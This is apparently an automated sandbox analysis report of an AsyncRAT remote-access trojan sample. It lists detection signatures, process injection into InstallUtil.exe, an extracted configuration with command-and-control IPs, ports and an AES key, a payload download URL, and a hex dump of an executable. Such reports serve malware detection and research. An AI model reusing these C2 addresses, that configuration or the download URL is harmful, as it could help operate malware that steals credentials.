Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report aQKifdER74.exe

Overview

General Information

Sample Name:aQKifdER74.exe
Analysis ID:491717
MD5:0d1c0270678dbf229c04ed4ec7e1a493
SHA1:5c6ffd912b0ec3d6f8a255de0c57aef3daebe490
SHA256:ca2f1fd98c74804cf417f07a86db13a71baed4647e919a110a82df0bfba02e85
Tags:AsyncRATexeRAT
Infos:

Most interesting Screenshot:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Yara detected AsyncRAT
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • aQKifdER74.exe (PID: 1172 cmdline: 'C:\Users\user\Desktop\aQKifdER74.exe' MD5: 0D1C0270678DBF229C04ED4EC7E1A493)
    • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • InstallUtil.exe (PID: 6432 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • cmd.exe (PID: 3184 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpC472.tmp.bat'' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6316 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "5.230.84.50,104.37.174.26,216.250.249.156", "Ports": "1465,1759,1985", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "CviFBxAIEOzETfTuvyDMiePzFR0znzEi", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQANdB+FD1mUGLSlrjGJfQJTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNjI4MTUxMzQ5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvmEbrEMzWo9JVpGbRwr3ek4iSx3sTcir9kldR41s+m9ewITiP3v0iC1d37Fokd0nq7baUSl3ivke7VdVJH3GvMmk+jCHGZlj2jar2hP5MO1mBSXFNyS38n1S6zBBco7qzTOBRnVwcQ+eFRYAk1/euE91dSPr1Rw4gCvnMtx6dLcFz6DvcAFc6haT2Vgex+ZkZwROCvDwkUokWJ8Ca5FnlHk681btEPoe0LHsPfM8UaT2VJGet/BstnXAOysbfwaUmshmkylc3aGT0sYoxnJPv1Czgj33a5WYG3SaoFYPErq+EG858A54myZktmY5bPDKxpO3jYZ3KoOmMoXnwBqQwNfSM/e9A22HyMdXRhNeHxgWrOuodVraygXwJUeXXaFcOCyXk5A6Wiu9ikkRsduIVWPLd83pvh+nY0tT82pmNNJz0xWopaHWGRkC76m8r5vdTN4O12biMl2kA1NLBNny7qA+L7rTBdBfWBhsvgtgcWhouFpT2zZ4ZgThx6cahnnWY8inHVVU/mGXN66gSQ7LjtMtfZi9Anc61Y+XIYCvApnGcM3R4wfOrxnV1ng9AtRYSXw14nhqdihw34UMHnQgXPPO3iVPwtK1L1WQF+hoSSLjlaIKr+B/tqSXFBn1sqP4iVPpIWNXlLJqOsNsb31q3JA/F7Rm63oGJLdPGyYU+nAgMBAAGjMjAwMB0GA1UdDgQWBBQe+aHUFc74O2+SJXH0Dvr61LagrzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAjncBHX6jCdTvHIuMWERJZ3kkkLg6uC51M6GGm1QHgLi3mO9GDfahgQZn1kSt7KBNxbc1QWh+EefejC68CauufM0m6RvrDrlrbwR7oyz/IMiQOlQXJH6KTo2qkkiWDc9vA6iUHi0Fc1cbG8otK8lYR0YBWWOmKKRDm0dDh2L+UXs4xVqUA2jgjku5D7yCiXG/CGo9Wm1TXmBrE7Jy08jF7PrdxTYp35miXUIAnf00heEASaK4JjO6yjXKRAl4SPTDDAiZiB9zF/dOlOwLir5gQZbL3IVDg29qL/fJvX7j+MxAwmIswdGCPcmVpuIcZV3ATQUtDf0fy0LW9tkTkZbAHZACC7fr4OSDz4DnGC6N/eL4MQ3i3IivOZTVH1tuq6RBBz7V0iZovpSjL12bSDmP7Fisj61iJpFYrHazO7kCY1rYYAvagboLuXfkVL2jaV/0PkIHTKJPoSPlug2u7BG/uGmyAd6UrXLa6anb2+1vxM0BuJc9SRm8Whig4ft9IS8mA3n1X/zY5pDh2Q4uGuqQ8Z8KuMASrB1R2g4+W7H4Nqa7Tsts4AzGI5bL7pOHpBvHTfDnhrbVSwFx3xthUfS4oQoR91bE/vJApNj8UtOSj7BfVCP7z/PYlRcc8CJXAh+7I68gfHVay5biuglStAKzEnPJlHdfD1PcpMlLsi7hBAw==", "ServerSignature": "BWoBc4eZBohdpLz283Tm3ZmxQ/7rKPDhHYADzF5w5DhgFbEdVbBgtrFu3y/tqN5+E3837aUiVvzOy/3qcLfDqqElMvqshWn2xwYrC4aDGwSG6TuED0v9sr/hdMIWsigM5d8QmxBagXj5ltNZ6ojCinxdEtSMOYVfYCKDD9b4Vf4vyNy7N9iEMfS5RSVHcI8G+10qKJZ/hezSEq60mZ0yIW/9FcAkfPD3trFkmMHiPaVZdnIPwnpdQN/EyU3kZpq3QIpR3ZULNAyH2cFhN5sgETgnfYMe5Cy3IUAwFN01FMGfaVTgG5DOFJBtWUstwtfhTL1l/+aqpwXY60foEma7MPo8tCN12Rj+4PT0DzZ8iRV0QvRNLnWeHw5emGOwsZIi/ItJiJi9RPQzOBlggFeJsr4ASow/nxLb5mIyXto0iS2ufIUq9i07QEMlRY4kt5JZBRauGtoCsrsfgo5D10UUleej2NfA2yAJ9wTznV1A/vLg241+oFk8fpgejIvhn7ofQ8igOAaGeQ6RcPvhvy1qx4l8/znhwwWLxRNxwO8aMZ4F6CkX0+n4yTNxKRs95SQqvWYQxgwWiIreJj/8czEyAENl9ne7iREFzEblANU+cKOW0px+0rktn+fSForeL2piJOA3yQ9K8/idHf/XQ+qkOZmdQc42zm9ajey1dtPJcn0=", "Group": "IZGroup"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        00000005.00000002.884796919.0000000002E7F000.00000004.00000001.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000000.00000002.702559639.0000000002DCB000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              5.2.InstallUtil.exe.6b30000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.aQKifdER74.exe.2c8fe7e.2.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  0.2.aQKifdER74.exe.2c95a48.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    0.2.aQKifdER74.exe.2c95a48.1.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\Desktop\aQKifdER74.exe' , ParentImage: C:\Users\user\Desktop\aQKifdER74.exe, ParentProcessId: 1172, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6432

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "5.230.84.50,104.37.174.26,216.250.249.156", "Ports": "1465,1759,1985", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "CviFBxAIEOzETfTuvyDMiePzFR0znzEi", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQANdB+FD1mUGLSlrjGJfQJTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNjI4MTUxMzQ5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvmEbrEMzWo9JVpGbRwr3ek4iSx3sTcir9kldR41s+m9ewITiP3v0iC1d37Fokd0nq7baUSl3ivke7VdVJH3GvMmk+jCHGZlj2jar2hP5MO1mBSXFNyS38n1S6zBBco7qzTOBRnVwcQ+eFRYAk1/euE91dSPr1Rw4gCvnMtx6dLcFz6DvcAFc6haT2Vgex+ZkZwROCvDwkUokWJ8Ca5FnlHk681btEPoe0LHsPfM8UaT2VJGet/BstnXAOysbfwaUmshmkylc3aGT0sYoxnJPv1Czgj33a5WYG3SaoFYPErq+EG858A54myZktmY5bPDKxpO3jYZ3KoOmMoXnwBqQwNfSM/e9A22HyMdXRhNeHxgWrOuodVraygXwJUeXXaFcOCyXk5A6Wiu9ikkRsduIVWPLd83pvh+nY0tT82pmNNJz0xWopaHWGRkC76m8r5vdTN4O12biMl2kA1NLBNny7qA+L7rTBdBfWBhsvgtgcWhouFpT2zZ4ZgThx6cahnnWY8inHVVU/mGXN66gSQ7LjtMtfZi9Anc61Y+XIYCvApnGcM3R4wfOrxnV1ng9AtRYSXw14nhqdihw34UMHnQgXPPO3iVPwtK1L1WQF+hoSSLjlaIKr+B/tqSXFBn1sqP4iVPpIWNXlLJqOsNsb31q3JA/F7Rm63oGJLdPGyYU+nAgMBAAGjMjAwMB0GA1UdDgQWBBQe+aHUFc74O2+SJXH0Dvr61LagrzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAjncBHX6jCdTvHIuMWERJZ3kkkLg6uC51M6GGm1QHgLi3mO9GDfahgQZn1kSt7KBNxbc1QWh+EefejC68CauufM0m6RvrDrlrbwR7oyz/IMiQOlQXJH6KTo2qkkiWDc9vA6iUHi0Fc1cbG8otK8lYR0YBWWOmKKRDm0dDh2L+UXs4xVqUA2jgjku5D7yCiXG/CGo9Wm1TXmBrE7Jy08jF7PrdxTYp35miXUIAnf00heEASaK4JjO6yjXKRAl4SPTDDAiZiB9zF/dOlOwLir5gQZbL3IVDg29qL/fJvX7j+MxAwmIswdGCPcmVpuIcZV3ATQUtDf0fy0LW9tkTkZbAHZACC7fr4OSDz4DnGC6N/eL4MQ3i3IivOZTVH1tuq6RBBz7V0iZovpSjL12bSDmP7Fisj61iJpFYrHazO7kCY1rYYAvagboLuXfkVL2jaV/0PkIHTKJPoSPlug2u7BG/uGmyAd6UrXLa6anb2+1vxM0BuJc9SRm8Whig4ft9IS8mA3n1X/zY5pDh2Q4uGuqQ8Z8KuMASrB1R2g4+W7H4Nqa7Tsts4AzGI5bL7pOHpBvHTfDnhrbVSwFx3xthUfS4oQoR91bE/vJApNj8UtOSj7BfVCP7z/PYlRcc8CJXAh+7I68gfHVay5biuglStAKzEnPJlHdfD1PcpMlLsi7hBAw==", "ServerSignature": "BWoBc4eZBohdpLz283Tm3ZmxQ/7rKPDhHYADzF5w5DhgFbEdVbBgtrFu3y/tqN5+E3837aUiVvzOy/3qcLfDqqElMvqshWn2xwYrC4aDGwSG6TuED0v9sr/hdMIWsigM5d8QmxBagXj5ltNZ6ojCinxdEtSMOYVfYCKDD9b4Vf4vyNy7N9iEMfS5RSVHcI8G+10qKJZ/hezSEq60mZ0yIW/9FcAkfPD3trFkmMHiPaVZdnIPwnpdQN/EyU3kZpq3QIpR3ZULNAyH2cFhN5sgETgnfYMe5Cy3IUAwFN01FMGfaVTgG5DOFJBtWUstwtfhTL1l/+aqpwXY60foEma7MPo8tCN12Rj+4PT0DzZ8iRV0QvRNLnWeHw5emGOwsZIi/ItJiJi9RPQzOBlggFeJsr4ASow/nxLb5mIyXto0iS2ufIUq9i07QEMlRY4kt5JZBRauGtoCsrsfgo5D10UUleej2NfA2yAJ9wTznV1A/vLg241+oFk8fpgejIvhn7ofQ8igOAaGeQ6RcPvhvy1qx4l8/znhwwWLxRNxwO8aMZ4F6CkX0+n4yTNxKRs95SQqvWYQxgwWiIreJj/8czEyAENl9ne7iREFzEblANU+cKOW0px+0rktn+fSForeL2piJOA3yQ9K8/idHf/XQ+qkOZmdQc42zm9ajey1dtPJcn0=", "Group": "IZGroup"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: aQKifdER74.exeMetadefender: Detection: 22%Perma Link
                      Source: aQKifdER74.exeReversingLabs: Detection: 53%
                      Antivirus detection for URL or domainShow sources
                      Source: http://5.230.68.154/img/icon/b.exeAvira URL Cloud: Label: malware
                      Machine Learning detection for sampleShow sources
                      Source: aQKifdER74.exeJoe Sandbox ML: detected
                      Source: 5.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: aQKifdER74.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49773 version: TLS 1.0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                      Source: aQKifdER74.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmp
                      Source: Binary string: ediskcz.pdb source: aQKifdER74.exe, 00000000.00000002.705051355.0000000012CC1000.00000004.00000001.sdmp
                      Source: Binary string: c:\Users\Administrator\Desktop\CRYPTED FILES\LOVEBILLION$$$$$$$.pdb source: aQKifdER74.exe
                      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmp
                      Source: Binary string: ediskcz.pdbh; source: aQKifdER74.exe, 00000000.00000002.705051355.0000000012CC1000.00000004.00000001.sdmp
                      Source: Binary string: c:\dev\sqlite\dotnet\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: InstallUtil.exe, 00000005.00000002.889863882.0000000007340000.00000004.00020000.sdmp
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\tmpC472.tmp.batJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49772 -> 5.230.68.154:80
                      Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 5.230.84.50:1465 -> 192.168.2.4:49774
                      Source: Joe Sandbox ViewASN Name: ASGHOSTNETDE ASGHOSTNETDE
                      Source: Joe Sandbox ViewASN Name: ASGHOSTNETDE ASGHOSTNETDE
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: global trafficHTTP traffic detected: GET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/icon/b.exe HTTP/1.1Host: 5.230.68.154Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
                      Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 18:36:17 GMTContent-Type: application/octet-streamContent-Length: 46080Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Thu, 23 Sep 2021 16:06:22 GMTETag: "b400-5ccabcfe1ddf5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 23 90 b7 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 a8 00 00 00 0a 00 00 00 00 00 00 6e c7 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 c7 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a7 00 00 00 20 00 00 00 a8 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ff 07 00 00 00 e0 00 00 00 08 00 00 00 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c7 00 00 00 00 00 00 48 00 00 00 02 00 05 00 fc 59 00 00 18 6d 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 2e 00 2f 00 5c 00 00 00 1e 02 28 18 00 00 0a 2a 1a 7e 13 00 00 04 2a 1e 02 80 13 00 00 04 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1e 02 80 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 2a 02 28 3e 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 3f 00 00 0a 2a 2e 73 18 00 00 0a 80 1a 00 00 04 2a e6 28 29 00 00 06 3a 28 00 00 00 28 2a 00 00 06 3a 1e 00 00 00 28 2b 00 00 06 3a 14 00 00 00 28 27 00 00 06 3a 0a 00 00 00 28 28 00 00 06 39 06 00 00 00 14 28 76 00 00 0a 2a 56 28 9c 00 00 0a 73 9d 00 00 0a 20 20 02
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49773 version: TLS 1.0
                      Source: global trafficTCP traffic: 192.168.2.4:49774 -> 5.230.84.50:1465
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.68.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.230.84.50
                      Source: aQKifdER74.exe, 00000000.00000002.702363399.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://5.230.68.154
                      Source: aQKifdER74.exeString found in binary or memory: http://5.230.68.154/img/icon/b.exe
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                      Source: aQKifdER74.exe, 00000000.00000002.705415584.000000001BC50000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000003.717385141.0000000005181000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                      Source: InstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: 77EC63BDA74BD0D0E0426DC8F8008506.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
